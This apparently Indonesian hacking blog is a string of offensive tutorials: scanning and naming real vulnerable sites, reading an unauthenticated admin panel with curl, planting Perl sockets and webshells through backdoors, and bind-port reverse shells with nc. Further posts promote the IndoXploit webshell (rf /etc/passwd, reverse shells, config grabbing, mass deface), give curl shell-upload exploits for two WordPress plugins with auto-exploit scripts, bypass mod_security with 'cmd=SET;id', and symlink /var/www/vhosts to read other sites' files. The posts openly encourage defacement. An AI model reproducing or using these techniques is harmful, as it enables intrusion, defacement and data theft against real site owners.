Codes Xploit: website
Showing posts with label website. Show all posts
Showing posts with label website. Show all posts

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

 
ANONIMCYBER | Haloo sobat apa kabar! disini saya akan membahas langkah langkah Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux pastinya sobat hacking atau cracking butuh mencari kelemahan suatu website kan? tenang saja saya akan membahasnya. simaklah pembahasan langkah langkah berikut yah sob.


Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perlu dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita tidak perlu install lagi sob.

Oke Sob, Kita Lanjut langsung saja ke langkah-langkahnya

Cara Muda Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux :
1. Buka terminal anda dan ketikan perintah

uniscan -h yaitu untuk melihat option yang ingin kita gunakan




2. Memulai scaning dengan perintah & tunggu scaning hingga selesai

uniscan -u www.target.com -qweds

CONTOH :

uniscan -u www.melbournefineart.com.au -qweds


3. Wow kita bisa lihat disini ternyata website tersebut vuln terhadap sql injection


Dan bisa kita tusbol menggunakan sqlmap pada kali linux


Scaning telah selesai


Sekian langkah langkah ini, gimana sob cukup mudahkan? Nah saya ingatkan nih untuk sobat, sobat harus ada tujuan tertentu jangan ada tujuan negative yahh. jika ada yang ditanyakan sobat bisa berkomentar dibawah. Trimkasih. 

Jangan lupa share yah dan sampai jumpa sob.

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

eMobileTracker.com - Trace Mobile Number - Mobile Number Tracker

 
Assalamualaikum. Haloooo, sudah lama tidak posting kembali, maaf karena saya sendiri sudah sibuk oleh kegiatan dunia nyata :v. Oke langsung saja, ke inti dari artikel ini.

Melacak nomor telpon? Ingin cari tau siapa orang dibalik nomor asing yang iseng ke nomor telpon kita? Yap, mungkin ini akan sedikit membantu buat anda!!


eMobileTracker.com adalah layanan yang dirancang khusus untuk Anda untuk Melacak Nomor Ponsel, Foto dan Lokasi Orang di seluruh dunia tanpa pendaftaran atau pendaftaran apapun. Kami menyediakan kemampuan untuk melacak jumlah ponsel di lebih dari 230 negara di seluruh dunia.

Dari deskripsi yang diberikan diatas oleh pihak eMobileTracker.com jelas bahwa penggunaan layanan ini sangat mudah sekali, kita hanya perlu mengunjungi halaman website tersebut lalu langsung saja memilih menu Track Mobile Number .

Pada Halaman ini anda cukup memilih kode negara dan juga isikan nomor telpon yang ingin kita trace.


Mungkin jika kalian memang orang yang sangat sulit percaya akan layanan gratis di internet pada awalnya pasti kalian tidak akan benar percaya apakah layanan ini akan berfungsi atau hanya sekedar trap belaka, atau mungkin fatalnya bisa saja ada malware pada layanan ini.

Yap benar, awalnya saya pun tidak akan percaya apakah ini berhasil atau tidak, namun karena penasaran saja, saya coba memasukan nomor telpon saya lalu saya coba Track Now dan hasilnya adalah sebagai berikut.



Wuutt? Bagaimana dia bisa tau nama dari Nomor telponnya?

Saya sendiri baru saja menggunakan layanan ini, masih belum dapat penjelasan bagaimana layanan ini bisa mengetahui nama/pemilik dari nomor telpon yang awal tadi kita input kan. Yang jelas setelah kita input nomor, data nomor telpon kita akan masuk kedalam log mereka seperti gambar awal diatas.

Sayangnya, layanan ini tidak secara akurat memberikan informasi dimana lokasi (kota/provinsi) dari pemilik nomor telpon, layanan ini hanya dapat memberikan informasi dari Negaranya saja. Namun yang jelas, cukup bagus juga untuk mengetahui orang orang yang iseng. Silakan mencobanya sendiri :D

Ya, sekian dulu dari saya, baru ada waktu untuk buat artikel lagi, mungkin kalian bisa mendiskusikannya bagaimana layanan ini mengambil informasi nama anda dari nomor telpon.

Simple Tools for Website Information Gathering

 
Halo, kali ini saya akan membagikan sebuah tools sederhana yang digunakan untuk Information Gathering sebuah website. Tools ini akan otomatis mengambil informasi:

- IP Address
- Hostname
- NameServer & Mail Server
- Scan Range IP 1-255 dan deteksi Hostname dari tiap IP nya.


Tools ini dibuat dengan bahasa program BASH. Jadi jika kalian menggunakan OS Windows, installah bash terlebih dahulu, akan mudah jika kalian menggunakan Windows 10 yang sudah terintegrasi Bash Ubuntu. 





Cara menggunakan:
------------------------------------------
user@linux $ wget https://pastebin.com/raw/5njuKAZ1 -O file.sh
user@linux $ chmod +x file.sh
user@linux $ ./file.sh
------------------------------------------

Oke sekian dulu.




Tutorial Socket Server with Perl

 
Halo, selamat malam. Kali ini gua mau sharing lagi gimana socket server.
Masih inget gimana kemarin Meme Comic Indonesia (MCI) kena deface di PORT 1337?
Yap, gua pake metode ini.



Oke langsung aja.
Sebelumnya untuk melakukan socket server, kalian harus terlebih dahulu masuk ke dalam server target kalian lewat backdoor yang kalian pasang di salah satu website.


Disini saya menggunakan Script Perl yang saya dapat dari referensi google, lalu sedikit saya modifikasi agar koneksinya selalu open.

Script: https://pastebin.com/zk8v8jp6

Upload script socket perl diatas tadi ke backdoor kalian.
Setelah di upload, jalankan command berikut untuk menjalankan file perlnya.
$ perl perlcgi.pl
 [perlcgi.pl] adalah nama file kalian.

Metode ini akan membuka koneksi pada port yang sudah ditentukan.
 Setelah itu, lalu jalankan command berikut untuk memastikan.
$ ps aux | grep 'perl'

Saya menamai file perlnya dengan nama  'percgi.pl', maka akan menghasilkan seperti di gambar (perl [namafile].pl)

Setelah itu, coba kita buka [IP:PORT] pada browser kita untuk memastikan lagi. Apakah koneksinya berhasil?

PORT yang saya buka adalah port 1337.



Yap Berhasil!!!.

Sekarang, kita Reverse IP tersebut dan lihat ada berapa banyak domain dalam IP yang sama.

Disini saya menggunakan
www.yougetsignal.com/tools/web-sites-on-web-server/


Coba salah satu website yang muncul disana dan tambahkan port 1337, karena di script tersebut saya set port 1337.


Dan lainnya pun sama.
---------------------------------------------------
--------------------------------------------------------


Oke sekian dulu yoooooo ~

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..


Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Deteksi CMS, Web Server, dan Framework dengan Wappalyzer

 


Wappalyzer adalah utilitas lintas platform yang mengungkap teknologi yang digunakan di situs web. Ini mendeteksi sistem pengelolaan konten, platform e-niaga, kerangka web, perangkat lunak server, alat analisis dan banyak lagi.


Dengan ini kalian akan semakin dipermudah dalam mendapatkan informasi-informasi dalam website. Untuk mendapatkannya cukup mudah, karena ini adalah sebuah addons pada browser. Kalian cukup menginstalnya saja.


Informasi lainnya kalian bisa langsung kunjungi website resmi dari Wappalyzer.
https://wappalyzer.com/

Oke sekian dulu, semoga bermanfaat.



IndoXploit Shell First Edition [ V.3 ]

 
Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload


Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Bypassing Blocked Linux Command by Mod_Security

 
Oke kali ini gua akan share tips tentang cara simple membypass command yang di blokir oleh mod_security. Pernah denger bukan?
Gambar terkait
ModSecurity merupakan
modul dari apache yang merupakan salah satu web server yang paling banyak
digunakan.
Kebanyakan serangan di internet dilakukan terhadap web untuk itu
diperlukan pengamanan khusus untuk menangani hal tersebut. Berbagai 
macam cara dapat dilakukan salah satunya adalah memasang WAF (Web
Application Firewall) salah satu WAF yang dibahas pada artikel ini
adalah ModSecurity.
ModSecurity merupakan web application firewall, Seperti firewall pada
umumnya yaitu melakukan filter data masuk dan keluar dan dapat untuk
menstop traffic yang dianggap berbahaya sesuai dengan rule yang
ditetapkan.
Pada ModSecurity terdapat beberapa fitur seperti HTTP Traffic Logging 
yang memungkinkan ModSecurity dapat melakukan full logging pada
transaksi HTTP. Dan juga terdapat fitur Virtual Patching yang merupakan
sebuah metode untuk melakukan patch sebuah vulnerability sebuah web
application tanpa menyentuh web application tersebut dengan membuat rule
yang memblok request yang berbahaya.
ModSecurity merupakan WAF yang menyediakan proteksi yang harus disetting
dengan rule karena Metode pemblokiran dari request-request yang
berbahaya tergantung dari rule yang ditetapkan. Untuk membuat
ModSecurity lebih powerfull dan untuk memungkinkan pengguna mendapatkan
keuntungan penuh Trustwave's SpiderLabs membuat project OWASP
ModSecurity Core Rule Set (CRS). CRS memberikan perlindungan generik
dari vulnerabilities yang tidak dikenali pada aplikasi web.
Contohnya, pernah mendapatkan sebuah akses backdoor yang ternyata dalam server tersebut di proteksi oleh modul modSecurity ini?. Dan ketika saja mencoba menjalankan command shell seperti berikut, munculah sesuatu seperti pada gambar dibawah ini.
Yap, seperti itulah hasilnya. Sewaktu kalian ingin menjalakan command linux pada command shell seperti command-command yang biasanya kita gunakan, yaitu:

- id
- uname
- pwd
- whoami

Tenang saja, jangan khawatir karena command-command tersebut masih bisa kita jalankan, tentu saja dengan cara membypassnya. Bagaimana caranya? mudah saja kalian cukup memanfaatkan command SET di Linux. Command SET itu sendiri merupakan command yang digunakan untuk mendefinisikan dan menentukan nilai dari system environtment (lingkungan sistem).

Oke, perhatikan gambar berikut.

Untuk menjalankan command yang di blokir oleh mod_security, cukup tambahkan command SET di depannya. serta pisahkan dengan ";" (tanpa kutip).

contohnya: shell.php?cmd=SET;id

lihat bukan? command yang tadinya akan menghasilkan "Not Acceptable" akan berjalan dengan baik.

Kalian juga dapat membypassnya dengan cara seperti ini:

- shell.php?cmd=SET;id ->shell.php?cmd=set $(id);set
- shell.php?cmd=SET;whoami -> setshell.php?cmd=set $(whoami);set
- shell.php?cmd=set $(uname -r);set

untuk yang menggukana command seperti ?cmd=set $(command);set, anda bisa melihat hasilnya di paling bawah.
(yap ini dia hasilnya ?cmd=set $(uname -rv);set , 3.12.65-188.ELK6.x86_64. Terdapat pada _=)

dan lainnya, kalian juga bisa menggunakan cara ini:

- shell.php?cmd=***;id
- shell.php?cmd=***;whoami

Dimana shell.php merupakan command shell milik kalian, silakan kalian kembangkan.
Oke sekian dulu kawan, semoga menambah wawasan.

Tutorial Symlink dengan Command Linux

 
Okee, berhubung banyak yang request tentang tools "symlink" dengan shell indoxploit. Kebetulan belakangan ini gua lagi sibuk, jadi ya udah gua share teknik ini dulu yaa. nanti akan gua update di shell indoxploit. Oke Langsung aja ........

1. Buatlah sebuah folder untuk letak folder symlink nya (bebas nama foldernya)

(disini, foldernya gua namain "symlink")

2. Masuklah kedalam folder yang baru kita buat tadi, lalu buat lah sebuah file .htaccess dengan isi sebagai berikut: 


3. Masukkan Command Linux ini di dalam Command Shell yang tersedia dalam shell backdoor. (di shell indoxploit, fitur "command"). Eksekusi Command ini di dalam folder yang kita buat tadi.

ln -s /var/www/vhosts sym 

/var/www/vhosts -> ganti dengan folder yang ingin di symlink, (ex: /home, /root, /var, )
sym -> ini ada folder yang nantinya akan menampung semua isi dari symlink tersebut.

Fungsi symlink secara singkat dapat di artikan bahwa sebuah folder (/var/www/vhosts) akan di link kan ke dalam sebuah folder baru bernama "sym" yang tadi kita masukkan dalam command shell. Jadi nanti di dalam folder /sym , isinya merupakan seluruh folder di dalam /var/www/vhosts
4. Yap, jika sudah, langsung buka di url: (www.target.com/symlink/sym/)

symlink -> merupakan nama folder yang kita buat di awal langkah tadi.
sym -> tempat menampung isi dari folder /var/www/vhosts



Dan terakhir, buka salah satu folder yang tertera disana , contohnya:
www.target.com/symlink/sym/domain.com/ (cek ss )

(ups, ternyata forbidden)

Mari kita cek lagi
(lihat, ada folder "httpdocs" setelah nama domainnya)

Folder "httpdocs" merupakan document_root dari web tersebut.

Okee, jadi kita buka begini:
www.target.com/symlink/sym/domain.com/httpdocs/


Oke, simple bukan? 
Silakan berkarya lagi, heheheheheh